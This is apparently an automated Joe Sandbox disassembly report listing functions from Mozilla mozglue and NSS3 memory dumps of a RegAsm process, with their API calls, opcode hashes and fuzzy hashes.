Opcode ID: 527f490175e0bf63b1e48833e3d77457e7cf8c2e380e59fa20e3f8821327dd37
Instruction ID: 951fb7a15f82ca62364663900cd14a9659f9ae53ca8ee456341676927bee59f1
Opcode Fuzzy Hash: 527f490175e0bf63b1e48833e3d77457e7cf8c2e380e59fa20e3f8821327dd37
Instruction Fuzzy Hash: 68118E31B04654DFCB00AF18C448B5ABBB4FB8932CF45C619E89557A50EB70A805CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CC10C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC10CD5

Part of subcall function 6CBFF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CBFF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC10D40
free.MOZGLUE ref: 6CC10DCB

Part of subcall function 6CBE5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CBE5EDB
Part of subcall function 6CBE5E90: memset.VCRUNTIME140(6CC27765,000000E5,55CCCCCC), ref: 6CBE5F27
Part of subcall function 6CBE5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CBE5FB2

free.MOZGLUE ref: 6CC10DDD
free.MOZGLUE ref: 6CC10DF2

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: d4c411fec5adeb77c16049cfb486bd1477c40f20fd4688f051b7b5cd8175b935
Instruction ID: bad68b92c5f09742981c22dcefadeb84cc4750a830bda2ad9c3453914a3a9fe1
Opcode Fuzzy Hash: d4c411fec5adeb77c16049cfb486bd1477c40f20fd4688f051b7b5cd8175b935
Instruction Fuzzy Hash: C041277191C7808BD320DF2AC08079EFBE5BF89754F108A6EE8D887B50E7709459CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6CC1CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CC0DA31,00100000,?,?,00000000,?), ref: 6CC1CDA4

Part of subcall function 6CBDCA10: malloc.MOZGLUE(?), ref: 6CBDCA26

Part of subcall function 6CC1D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CC1CDBA,00100000,?,00000000,?,6CC0DA31,00100000,?,?,00000000,?), ref: 6CC1D158
Part of subcall function 6CC1D130: InitializeConditionVariable.KERNEL32(00000098,?,6CC1CDBA,00100000,?,00000000,?,6CC0DA31,00100000,?,?,00000000,?), ref: 6CC1D177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CC0DA31,00100000,?,?,00000000,?), ref: 6CC1CDC4

Part of subcall function 6CC17480: ReleaseSRWLockExclusive.KERNEL32(?,6CC215FC,?,?,?,?,6CC215FC,?), ref: 6CC174EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CC0DA31,00100000,?,?,00000000,?), ref: 6CC1CECC

Part of subcall function 6CBDCA10: mozalloc_abort.MOZGLUE(?), ref: 6CBDCAA2

Part of subcall function 6CC0CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CC1CEEA,?,?,?,?,00000000,?,6CC0DA31,00100000,?,?,00000000), ref: 6CC0CB57
Part of subcall function 6CC0CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CC0CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CC1CEEA,?,?), ref: 6CC0CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CC0DA31,00100000,?,?,00000000,?), ref: 6CC1D058

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 25b9197ab4cd0254443cd936ea1acd4f781d22f1a0ebf478b56038d125cda98c
Instruction ID: e41a2b44b69d8dee9fbe19a7dac942c1da2aae4cd70d4a69c88553b350ffc7a1
Opcode Fuzzy Hash: 25b9197ab4cd0254443cd936ea1acd4f781d22f1a0ebf478b56038d125cda98c
Instruction Fuzzy Hash: 66D15071A04B469FD709CF29C480799F7F1BF89308F01866DE8598BB51EB31E9A5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD1720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6CBD17B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 6CBD18EE
free.MOZGLUE(?), ref: 6CBD1911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBD194C

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: 849c2bf6b9e204162fc55e63c5dddb843c6fd1e9b3cbe8417b270982a81f0f18
Instruction ID: b49e7e3dcb31d3290ed8ccf53d1660d865be509b4b8554a930db4caa7e42fd73
Opcode Fuzzy Hash: 849c2bf6b9e204162fc55e63c5dddb843c6fd1e9b3cbe8417b270982a81f0f18
Instruction Fuzzy Hash: 1381C670A15245DFDB08CF68D8945EEBBB1FF89324F09452CE815AB754D730E845CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CBE5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6CBE5D40
EnterCriticalSection.KERNEL32(6CC4F688), ref: 6CBE5D67
__aulldiv.LIBCMT ref: 6CBE5DB4
LeaveCriticalSection.KERNEL32(6CC4F688), ref: 6CBE5DED

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 1d7c4000ed9bf45000a0c6edcda3b143a54c2c6c6e7c1f2343aef2d8382ea6ef
Instruction ID: 19698a28313b9ad79fb913176488146df53c7ececfb20bd84655bb3c1ff7aef1
Opcode Fuzzy Hash: 1d7c4000ed9bf45000a0c6edcda3b143a54c2c6c6e7c1f2343aef2d8382ea6ef
Instruction Fuzzy Hash: 14517171E001698FDF08DFA8C854ABEBBB2FB89718F1AC61DD815A7750C730A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CBCCDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBCCEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CBCCEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CBCCF4E

Strings

0, xrefs: 6CBCCF30

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 50dd173987566b32e1635595f6be70a359a3a1b038a550aa191a68db691b8c6a
Instruction ID: e6adcf9474914a47b1cc6f190e86000c4b4f425e02e720e40ba975b0e816f63a
Opcode Fuzzy Hash: 50dd173987566b32e1635595f6be70a359a3a1b038a550aa191a68db691b8c6a
Instruction Fuzzy Hash: A9510375A0026A8FCB00CF18C490A9ABBB5EF99304F19869DD8595F751D731FD06CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE04FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6CCE85D2,00000000,?,?), ref: 6CE04FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE0500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE050C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE050D6

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 54629ad1390373a82757e95b21c9a20bcf773f32a9eab89efb0f251fdf017a30
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 214180B2A016118BCB18CF18DC9179AB7E1BF4431871D466DC84ACBB02E379E891CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 6CC277D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC277FA
?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6CC27829

Part of subcall function 6CBFCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6CBC31A7), ref: 6CBFCC45
Part of subcall function 6CBFCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6CBC31A7), ref: 6CBFCC4E

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC2789F
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC278CF

Part of subcall function 6CBC4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CBC4E5A
Part of subcall function 6CBC4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CBC4E97

Part of subcall function 6CBC4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC03EBD,6CC03EBD,00000000), ref: 6CBC42A9

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
String ID:
API String ID: 2525797420-0
Opcode ID: e34986151fd222cd9d0c8c20f3c844934a902575a3011489eb662d594cb20dc0
Instruction ID: ff11f732ca37ad29edc61665e3ec71e1fcbffb07f1de5db0731f0d4b4b276229
Opcode Fuzzy Hash: e34986151fd222cd9d0c8c20f3c844934a902575a3011489eb662d594cb20dc0
Instruction Fuzzy Hash: 6A419F719047469FD300DF29D48056BFBF4FF8A254F204A2EE4A987740EB70D55ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CD46C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CD46C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CD46CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CD46CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CE68FE0), ref: 6CD46CFE

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 20b4d86a575072b1318d28ca944942ddca35242df9300326e5226a61c4663bdd
Instruction ID: 9db56b83a474a13b1da33c521d7edcebf59b6c9bbf1dd59aaa8fd17713b8b5e0
Opcode Fuzzy Hash: 20b4d86a575072b1318d28ca944942ddca35242df9300326e5226a61c4663bdd
Instruction Fuzzy Hash: 5C3194B5A002169FDB04CF65C851ABFBBF5EF45248F10843DDA06D7750EB719916CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CC06470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CC082BC,?,?), ref: 6CC0649B

Part of subcall function 6CBDCA10: malloc.MOZGLUE(?), ref: 6CBDCA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC064A9

Part of subcall function 6CBFFA80: GetCurrentThreadId.KERNEL32 ref: 6CBFFA8D
Part of subcall function 6CBFFA80: AcquireSRWLockExclusive.KERNEL32(6CC4F448), ref: 6CBFFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC0653F
free.MOZGLUE(?), ref: 6CC0655A

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 9fcc40dc149c4ea9098765b7e89e4260c47fde3cb6f183e54b9a316c1787ef76
Instruction ID: 352e54c8b1732bf4d65423d999de32336328e9143b9a5b96d027ed62ecdee443
Opcode Fuzzy Hash: 9fcc40dc149c4ea9098765b7e89e4260c47fde3cb6f183e54b9a316c1787ef76
Instruction Fuzzy Hash: 39318FB5A047559FD700CF24D894A9FBBF4BF89318F40842EE85A97740EB30E919CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CBFFF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6CC1D019,?,?,?,?,?,00000000,?,6CC0DA31,00100000,?), ref: 6CBFFFD3
memcpy.VCRUNTIME140(00000000,?,?,?,6CC1D019,?,?,?,?,?,00000000,?,6CC0DA31,00100000,?,?), ref: 6CBFFFF5
free.MOZGLUE(?,?,?,?,?,6CC1D019,?,?,?,?,?,00000000,?,6CC0DA31,00100000,?), ref: 6CC0001B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6CC1D019,?,?,?,?,?,00000000,?,6CC0DA31,00100000,?,?), ref: 6CC0002A

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 826125452-0
Opcode ID: 04a27485443596ad8c0ac81178711ff0e6548643dc3e688ed65a079031bcee2b
Instruction ID: 801ec5d6c3e2f73089ccda1d83103183433ebe5f7b4dd2398d44191ce4789f89
Opcode Fuzzy Hash: 04a27485443596ad8c0ac81178711ff0e6548643dc3e688ed65a079031bcee2b
Instruction Fuzzy Hash: 242106B2B002515BDB089E789C948AFB7FAEB853243250338E425D7780FB31AD0682D1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD84FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6CD8B60F,00000000), ref: 6CD85003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6CD8B60F,00000000), ref: 6CD8501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6CD8B60F,00000000), ref: 6CD8504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6CD8B60F,00000000), ref: 6CD85064

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: dca1a537d1d176507e563d2a8fb190a0fc01ac0ebb0fe3393f2d9845a7767529
Instruction ID: 7c019a2981d409289869146e0f2b271d587da765eff9389a8171f2288a26967e
Opcode Fuzzy Hash: dca1a537d1d176507e563d2a8fb190a0fc01ac0ebb0fe3393f2d9845a7767529
Instruction Fuzzy Hash: C231F7B4A05606CFDB00EF68C48466ABBF4FF49344B158569D85AD7711E730E894CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CDB2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CDB2E08

Part of subcall function 6CDA14C0: TlsGetValue.KERNEL32 ref: 6CDA14E0
Part of subcall function 6CDA14C0: EnterCriticalSection.KERNEL32 ref: 6CDA14F5
Part of subcall function 6CDA14C0: PR_Unlock.NSS3 ref: 6CDA150D

PORT_NewArena_Util.NSS3(00000400), ref: 6CDB2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CDB2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CDB2E95

Part of subcall function 6CDA1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CD488A4,00000000,00000000), ref: 6CDA1228
Part of subcall function 6CDA1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CDA1238
Part of subcall function 6CDA1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CD488A4,00000000,00000000), ref: 6CDA124B
Part of subcall function 6CDA1200: PR_CallOnce.NSS3(6CEA2AA4,6CDA12D0,00000000,00000000,00000000,?,6CD488A4,00000000,00000000), ref: 6CDA125D
Part of subcall function 6CDA1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CDA126F
Part of subcall function 6CDA1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CDA1280
Part of subcall function 6CDA1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CDA128E
Part of subcall function 6CDA1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CDA129A
Part of subcall function 6CDA1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CDA12A1

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: be06feacee26bf963a7ac957aa6101519f3b72826a7be38bb66b842623a24c27
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 9321D4F6D003458BE700CF559D48BAA3764AF9534CF110269FD097B762F7B1E69883A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD6ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CD6ACC2

Part of subcall function 6CD42F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CD42F0A
Part of subcall function 6CD42F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CD42F1D

Part of subcall function 6CD42AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CD40A1B,00000000), ref: 6CD42AF0
Part of subcall function 6CD42AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CD42B11

CERT_DestroyCertList.NSS3(00000000), ref: 6CD6AD5E

Part of subcall function 6CD857D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CD4B41E,00000000,00000000,?,00000000,?,6CD4B41E,00000000,00000000,00000001,?), ref: 6CD857E0
Part of subcall function 6CD857D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CD85843

CERT_DestroyCertList.NSS3(?), ref: 6CD6AD36

Part of subcall function 6CD42F50: CERT_DestroyCertificate.NSS3(?), ref: 6CD42F65
Part of subcall function 6CD42F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CD42F83

free.MOZGLUE(?), ref: 6CD6AD4F

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: d113d4db055b0afa70110401a50340bec9e21b4790d76b9b4fad2be8259f90ee
Instruction ID: 7d2a3c8f5fe14f3703ff9c6d3f620f446e5e7822eaba55bd2d9d54aa9536b951
Opcode Fuzzy Hash: d113d4db055b0afa70110401a50340bec9e21b4790d76b9b4fad2be8259f90ee
Instruction Fuzzy Hash: 0021C3B1D002248BEB10DF66D8055EEB7B4EF05218F458068D849BBB21FB31AA59CBE1

Uniqueness

